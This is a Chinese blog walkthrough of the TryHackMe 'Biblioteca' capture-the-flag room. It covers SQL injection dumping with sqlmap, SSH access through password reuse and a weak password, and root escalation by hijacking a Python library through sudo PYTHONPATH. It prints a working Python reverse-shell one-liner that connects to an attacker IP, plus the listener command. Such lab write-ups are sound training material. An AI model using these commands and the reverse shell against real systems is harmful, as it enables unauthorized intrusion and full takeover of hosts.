靶场练习-TryHackMe-Biblioteca

已于 2023-02-08 14:43:57 修改
阅读量324 收藏
点赞数
分类专栏: 靶场练习 文章标签: linux web安全 网络安全
于 2023-02-08 14:38:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746286/article/details/128935403
版权

房间简介:

Shhh. Be very very quiet, no shouting inside the biblioteca.

房间链接:

https://tryhackme.com/room/biblioteca#

问题:

挑战开始:

首先扫描下目标IP

nmap -sC -sV 10.10.220.193

└─# nmap -sC -sV 10.10.220.193
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-08 05:40 UTC
Nmap scan report for ip-10-10-220-193.eu-west-1.compute.internal (10.10.220.193)
Host is up (0.0075s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 000bf9bf1d49a6c3fa9c5e08d16d8202 (RSA)
|   256 a10c8e5df07fa532b2eb2f7abfedbf3d (ECDSA)
|_  256 9eefc90afce99eede32db130b65fd40b (ED25519)
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title:  Login 
MAC Address: 02:19:F7:E0:58:6B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

可以看到开放了两个端口,访问下8000

发现是一个登陆口

尝试了下弱口令,提示账号/密码错误

看了下下面有注册的地方,注册一个号
注册了一个账号test/test
尝试登陆

但是并没有发现什么有用的信息,cookie之类的也都无法越权
于是退出登陆,打开burp登陆时抓包

貌似存在注入,所以保存数据包丢sqlmap跑了下
成功跑出注入

sqlmap -r test.txt --current-db

成功找出当前库website

sqlmap -r test.txt -D website --tables

只有一个表users

sqlmap -r test.txt -D website -T users --dump

直接爆库,成功获取用户信息

尝试用第一个用户登陆

额,一样的界面,没啥发现,尝试密码复用SSH

成功ssh,发现flag在另一个用户目录下,且没有权限读取

这里看了半天,没找到好提权的方法,看来还是先得想办法获取另一个用户的密码

这里首先想到的是密码复用,但是没成功,然后想的是弱口令–还真成功了–
hazel用户的密码就是它本身

成功找到user flag

接着开始尝试提权,首先先看下同一目录下的另一个文件

但是好像和提权没啥关系
尝试sudo -l
发现可以免密root权限执行python运行这个脚本
那重新看下这个py脚本,发现天调用了本地的一个库
那么我们可以修改本地环境变量来触发恶意脚本

首先我们复制hashlib.py到tmp下

cp /usr/lib/python3.8/hashlib.py /tmp/hashlib.py

接着把一下代码加入hashlib.py中

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.141.145",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

接着本地做好监听

nc -lvnp 1234

最后更改环境变量并sudo执行

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py

成功收到shell

成功获取root flag

NooEmotion
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
容安馆札记 606-610则 笺疏
u014743724的博客
02-03 1531
六〇六 Jottings: Massimo d’Azeglio described a ridiculous fad in the historical painting of his time(马西莫·达泽格里奥在他的时间的历史绘画中描述了荒谬的表现): “Anche in arte vi fu allora un gran movimento verso il culto del vero(即使在艺术中也有一个伟大的运动来崇拜真实)…. Si cercò col vero dinanzi la fo
Twu-Biblioteca-Gabrielchaves
02-10
【标题】"Twu-Biblioteca-Gabrielchaves" 是一个项目名称,可能是由开发者Gabriel Chaves创建的一个图书馆管理系统的源代码。这个项目的重点是使用HTML来构建用户界面,这表明它主要关注前端开发。 【描述】由于...
2018-10-16 星期二
weixin_30448603的博客
10-16 109
English: listening, speaking, reading, writing and translating 1.Is punctuality important? Yes, super! I think we should be punctual in any given situation. For example, for job inter...
variant php,PHP: VARIANT - Manual
weixin_35827671的博客
03-10 95
MétodosVARIANT::VARIANT( $value= ?, int $type= ?, int $codepage= ?)constructor de clase VARIANT. Parámetros:valuevalor inicial. si se omite, o se le da valor null se creará un objeto vacío VT_EMPTY.ty...
IMP-00058: ORACLE error 1882 encountered
weixin_34194702的博客
04-04 794
问题现象: IMP-00058: ORACLE error 1882 encountered ORA-01882: timezone region not found ORA-06512: at "SYS.DBMS_EXPORT_EXTENSION", line 810 ORA-06512: at line 1 IMP-00009: abnormal end of export fi...
探索高效编程的宝库:Biblioteca
gitblog_00093的博客
05-30 251
探索高效编程的宝库:Biblioteca 项目地址:https://gitcode.com/brunomaletta/Biblioteca 在这个快速发展的科技时代,算法和数据结构对于软件开发的重要性不言而喻。Biblioteca是一个由UFMG(联邦米纳斯吉拉斯大学)学生精心打造的开源项目,它集合了多种高级算法、数据结构以及实用工具,旨在帮助程序员在解决复杂问题时能够更加得心应手。 项目介绍 B...
TensorFlow Hub (2)-Object Detection Colab
chenvvei的博客
05-22 7171
TensorFlow Hub (2)-Object Detection Colab 文章目录导入和设置实用工具函数加载图像的辅助方法utilities可视化工具加载标签图数据(用于绘图)建立检测模型并加载预训练的模型权重从TensorFlow Hub加载所选模型加载图像进行推断可视化结果[可选的]总结 导入和设置 import os import pathlib import matplotlib import matplotlib.pyplot as plt import io import scip
php db2_connect,PHP: db2_connect - Manual
weixin_32159409的博客
03-13 117
i5_libUna cadena que indica la lista de bibliotecas que se utilizará por default para resolverreferencias no evaluadas a archivos. Este parámetro no es válidosi en la conexión se utiliza el modo de no...
网络搜索技术1--Google
christinavivi的专栏
03-15 1714
1  国外论文搜索      我们注意到,从网上找到的国外论文大部分是pdf格式。所以,    细心一点会发现,在google搜索的文献旁边都有一个[pdf]字样,因    此我尝试用“key words" +"pdf" 的模式搜索国外文献,效果很    好!     比如,我查找国外海洋防污涂料的文献       输入 “antifouling pdf ",结果举例:     [PDF] SEA
google检索技巧-从菜鸟到黑客
kakaxia6337的专栏
02-25 3505
使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的),下面就来介绍一些常用的语法。 intext:  这个就是把网页中的正文内容中的某个字符做为搜索条件,例如在google里输入:intext:动网,将返回所有在网页正文部分包含"动网"的网页。  allintext:  使用方法和intext类似.  intitle:  和上面那个intext差不多
twu-biblioteca-dionysioskastellanis
04-29
【标题】"twu-biblioteca-dionysioskastellanis" 是一个开源项目,源自GitHub,由用户Dionysios Kastellanis创建。这个项目主要基于Java编程语言,旨在实现一个图书馆管理系统的功能。从项目名可以推测,它可能是...
twu-biblioteca-srikanth
05-08
【标题】"twu-biblioteca-srikanth" 是一个开源项目,旨在为班加罗尔公共图书馆创建一个图书馆管理系统。这个系统是用Java语言编写的,它提供了一个全面的功能集来管理图书、借阅者和图书的借阅流程。 【描述】中的...
twu-biblioteca-SowmyaV
05-26
Biblioteca是基于控制台的图书馆管理系统。 此应用程序可用于查看书籍列表,电影列表,结帐书籍,电影并返回它们。 除此之外,图书馆管理员还可以查看用户的“结帐历史记录”。 安装 下载软件包并解压缩。 使用ant...
twu-biblioteca-jaswanth
05-26
#ThoughtWorks 101课程-Biblioteca项目 建立: ant 运行: ant run #身份验证详细信息 普通用户:库ID:123-123密码:pwd 图书管理员:图书馆ID:123-321密码:dwp
【JS逆向课件:第十三课:异步爬虫】
weixin_50556117的博客
07-22 1055
现在大部分视频客户端都采用HTTP Live Streaming(HLS,Apple为了提高流播效率开发的技术),而不是直接播放MP4等视频文件。HLS技术的特点是将流媒体切分为若干【TS片段】(比如几秒一段),然后通过一个【M3U8列表文件】将这些TS片段批量下载供客户端播放器实现实时流式播放。因此,在爬取HLS的流媒体文件的思路一般是先【下载M3U8文件】并分析其中内容,然后在批量下载文件中定义的【TS片段】,最后将其【组合】成mp4文件或者直接保存TS片段。
Linux:基础命令学习
qq_55038440的博客
07-20 1173
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
linux上导出数据库
最新发布
weixin_43652507的博客
07-24 166
linux上导出数据库 MySQL、PostgreSQL、SQLite、MongoDB
【北京迅为】《i.MX8MM嵌入式Linux开发指南》-第三篇 嵌入式Linux驱动开发篇-第三十九章 Linux MISC驱动
BeiJingXunWei的博客
07-22 622
misc 的意思是混合的杂项的,所以 misc 设备驱动也叫做杂项设备驱动,当我们板子上的某个设备没有办法分类时,就可以用 misc 设备驱动。设备号包含主设备号和次设备号,设备号是计算机识别设备的一种方式,主设备号相同的就被视为同一类设备,主设备号在Linux系统里面是唯一的,次设备号不一定唯一。所有的 misc 设备驱动的主设备号都为 10,不同的设备使用不同的从设备号。通过39.1章节的学习,我们已经把杂项设备的基本概念搞懂了,在本实验中,使用 misc 设备驱动的方式来编写最简单的杂项设备的驱动。
lua入门教程:编程实战指南(第3版)
CIP-Biblioteca do Departamento de Informática, PUC-Rio记录显示,这本书共有188页,加上附录和其他内容共计348页,尺寸为25厘米。内容覆盖了Lua语言的基础知识、语法、函数、数据类型、控制结构、表和集合等核心...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值